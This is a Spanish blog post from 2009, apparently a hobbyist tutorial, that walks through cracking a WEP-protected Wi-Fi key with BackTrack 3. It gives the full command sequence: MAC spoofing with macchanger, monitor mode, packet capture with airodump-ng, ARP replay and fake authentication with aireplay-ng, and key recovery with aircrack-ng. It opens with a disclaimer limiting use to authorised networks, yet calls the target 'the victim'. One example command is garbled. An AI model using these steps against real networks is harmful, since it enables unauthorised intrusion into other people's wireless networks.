aca les dejo un pequeño manual para que puedan probar la seguridad de su red inalambrica,. ojo solo usen este manual para las redes que esten bajo su autorizacion, no es correcto usarlo en redes ajenas, y en muchos paises en un delito,..
ya bueno empezemos
lo primero es saber que notebook tienen, el mio es un compaq presario f700 amd
con tarjeta atheros.
con esos datos no se necesita nada mas
ahora hay que descargarse la distribucion linux que vamos a usar, en este caso es backtrack 3, con unos simples "buscar" la encuentras rapidisimo,.
una vez que la tengas debes iniciar la distro en modo live cd .
una vez adentro vas al terminal y escribes
airmon-ng stop ath0
(esto es para detener la tarjeta inalambrica)
despues hay que escribir
macchanger -m 11:22:33:44:55:66 wifi0
(eso es para cambiar vuestra mac)
despues proseguimos a poner la tarjeta en modo monitor
airmon-ng start wifi0
ahora vemos las redes al alcanse
airodump-ng ath0
y ahora algo importante
debemos anotar lo sgte
BSSID (xx:xx:xx:xx:xx:xx)
CH (en este caso es 5)
ESSID (Nombre de la RED)
cuando hallas anotado todo aprietas ctrl+c para detener el escaneo
despues procedemos a escribir
airodump-ng --channel x --write xxx ath0
x= canal, como en el paso anterio el 5 pues quedaria asi (--channel 5)
xxx= nombre, aqui pueden ponel el nombre que quieran, pero acuerdense de lo que ponen, y en mi caso quedaria asi (--write pass)
airodump-ng --channel 5 --write pass ath0
Ahora abrimos otra shell o terminal...
y en ella ponemos:
aireplay-ng -3 -b (mac de la victima) -h (nuestra mac) ath0
y pues quedaria mas o menos asi;
aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h 11:22:33:44:55:66 ath0
(esto es para empezar a capturar datos arp)
ahora abrimos otra terminal y escribimos
aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (nuestra mac) ath0
asi deberia quedar
aireplay-ng -1 0 ESSID -a xx:xx:xx:xx:xx:xx -h 11:22:33:44:55:66 ath0
si te sale la misma imagen ya estas al otro lado.
ahora solo queda esperar un buen rato (min 10 min) asi que te recomiendo que te hagas un cafe y tengas paciencia, entre mas datos junte mas probabilidad hay de acertar.
despues cuando veas que tienes suficientes datos
abrimos otra terminal y escribimoos
aircrack-ng xx-01.cap
xx= el nombre que les dije que se acordaran, en mi caso es (pass)
asi quedaria
aircrack-ng pass-01.cap
Como la red que nosotros elegimos es la opcion 1 pues ponemos el 1 y damos enter.
y listo ya tenemos la clave,
(ojo solo funciona con cifrado wep)
facil?
a prueba de tontos diria yo
miércoles, 21 de octubre de 2009
Suscribirse a:
Enviar comentarios (Atom)
..:: Acerca de este blog ::..
Este blog fue diseñado por el Lic. Felipe Aguilera - Lic. en Análisis de Sistemas.
Cualquier duda o consulta comunicarse con:
msfa001@gmail.com
0 entradas a blog:
Publicar un comentario